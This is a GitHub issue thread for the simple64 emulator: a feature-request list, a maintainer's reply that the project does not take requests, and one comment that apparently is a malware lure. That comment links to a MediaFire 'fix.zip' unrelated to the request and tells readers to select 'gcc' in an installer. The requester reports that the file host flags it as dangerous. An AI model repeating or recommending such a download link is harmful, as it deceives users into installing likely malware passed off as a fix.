### ISSUE TITLE
[Feature Request] Features I'd like to see

### ISSUE THREAD

**Issue by PerdGateEnjoyer** [simple64/simple64#447]
**Desktop (please complete the following information):**
 - OS: Windows
 - Version: 11
 - GPU: Intel UHD Graphics

* Ability to edit input configuration while a game is running
* Option to pause emulation on focus loss (e.g. Clicking onto another tab to check a guidebook)
* Ability to undo loading a savestate
* Improved cheat input system
* Presets for screen resolution
* Browser for filepaths in settings (ScreenshotPath, SaveStatePath, etc.)

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by PerdGateEnjoyer** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

When I click on the link, it says the file was "determined to be dangerous" and won't let me download it.

**Comment by loganmc10** [comment]
Thanks, this project doesn't take feature requests. However I'm open to any contributions if you or someone else would like to work on these features.
